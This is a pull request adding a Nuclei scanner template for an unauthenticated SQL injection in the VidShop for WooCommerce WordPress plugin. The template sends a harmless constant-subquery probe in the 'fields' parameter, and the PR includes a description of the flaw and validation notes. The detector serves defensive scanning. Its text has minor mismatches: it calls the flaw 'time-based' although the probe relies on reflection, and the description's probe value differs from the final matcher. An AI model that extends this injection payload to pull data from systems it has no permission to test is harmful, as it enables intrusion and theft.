### PR TITLE
Add CVE-2026-0702 template

### DIFF
--- a/http/cves/2026/CVE-2026-0702.yaml
+++ b/http/cves/2026/CVE-2026-0702.yaml
@@ -1,0 +1,37 @@
+id: CVE-2026-0702
+
+info:
+  name: VidShop for WooCommerce <= 1.1.4 - Unauthenticated SQL Injection
+  author: str4k3r
+  severity: high
+  description: |
+    VidShop for WooCommerce <= 1.1.4 passes the unauthenticated `fields`
+    parameter of `/wp-json/vsfw/v1/videos` directly into its SQL SELECT list.
+    A subquery expression is therefore evaluated and reflected in the JSON
+    response. Version 1.1.5 validates field names before building the query.
+  remediation: Upgrade VidShop for WooCommerce to 1.1.5 or later.
+  reference:
+    - https://plugins.trac.wordpress.org/browser/vidshop-for-woocommerce/trunk/includes/rest-api/v1/class-videos-controller.php#L297
+    - https://plugins.trac.wordpress.org/browser/vidshop-for-woocommerce/trunk/includes/utils/class-query-builder.php#L778
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/a61d8d2a-742f-45f1-9146-f733b80ef195?source=cve
+  classification:
+    cve-id: CVE-2026-0702
+    cwe-id: CWE-89
+  metadata:
+    verified: true
+    max-request: 1
+  tags: cve,cve2026,wordpress,woocommerce,vidshop,sqli,unauth
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-json/vsfw/v1/videos?fields=%28SELECT%20424242%29%20as%20id"
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        part: body
+        words:
+          - '"id":424242'

--- a/http/cves/2026/CVE-2026-0702.yaml
+++ b/http/cves/2026/CVE-2026-0702.yaml
@@ -1,20 +1,22 @@
 id: CVE-2026-0702
 
 info:
-  name: VidShop for WooCommerce <= 1.1.4 - Unauthenticated SQL Injection
+  name: VidShop for WooCommerce <= 1.1.4 - SQL Injection
   author: str4k3r
   severity: high
   description: |
-    VidShop for WooCommerce <= 1.1.4 passes the unauthenticated `fields`
-    parameter of `/wp-json/vsfw/v1/videos` directly into its SQL SELECT list.
-    A subquery expression is therefore evaluated and reflected in the JSON
-    response. Version 1.1.5 validates field names before building the query.
-  remediation: Upgrade VidShop for WooCommerce to 1.1.5 or later.
+    VidShop – Shoppable Videos for WooCommerce plugin for WordPress <= 1.1.4 contains a time-based SQL injection caused by insufficient escaping of the 'fields' parameter, letting unauthenticated attackers extract sensitive database information.
+  impact: |
+    Unauthenticated attackers can extract sensitive information from the database, potentially compromising data confidentiality.
+  remediation: |
+    Update to the latest version of VidShop – Shoppable Videos for WooCommerce plugin for WordPress.
   reference:
     - https://plugins.trac.wordpress.org/browser/vidshop-for-woocommerce/trunk/includes/rest-api/v1/class-videos-controller.php#L297
     - https://plugins.trac.wordpress.org/browser/vidshop-for-woocommerce/trunk/includes/utils/class-query-builder.php#L778
     - https://www.wordfence.com/threat-intel/vulnerabilities/id/a61d8d2a-742f-45f1-9146-f733b80ef195?source=cve
   classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
     cve-id: CVE-2026-0702
     cwe-id: CWE-89
   metadata:
@@ -25,13 +27,15 @@ info:
 http:
   - method: GET
     path:
-      - "{{BaseURL}}/wp-json/vsfw/v1/videos?fields=%28SELECT%20424242%29%20as%20id"
+      - "{{BaseURL}}/wp-json/vsfw/v1/videos?fields=%28SELECT%20424242*2%29%20as%20id"
+
     matchers-condition: and
     matchers:
       - type: status
         status:
           - 200
+
       - type: word
         part: body
         words:
-          - '"id":424242'
+          - '"id":848484'


### PR DESCRIPTION
## Summary

Adds a detector for CVE-2026-0702 in VidShop for WooCommerce. The unauthenticated `fields` parameter is interpolated into the REST query's SELECT list in affected releases, while 1.1.5 validates field expressions.

## Detection

The template requests the generic `/wp-json/vsfw/v1/videos` endpoint with a constant-only `(SELECT 424242) AS id` expression. A vulnerable response reflects `"id":424242`; the request does not insert, update, or delete application data.

## References

- https://www.wordfence.com/threat-intel/vulnerabilities/id/a61d8d2a-742f-45f1-9146-f733b80ef195?source=cve
- https://plugins.trac.wordpress.org/browser/vidshop-for-woocommerce/trunk/includes/rest-api/v1/class-videos-controller.php#L297
- https://plugins.trac.wordpress.org/browser/vidshop-for-woocommerce/trunk/includes/utils/class-query-builder.php#L778

## Validation

Previously recorded native Nuclei v3.11.0 differential: vulnerable 1.1.4 detected 3/3; fixed 1.1.5 not detected 3/3. The final template was syntax-validated and quality-checked before submission.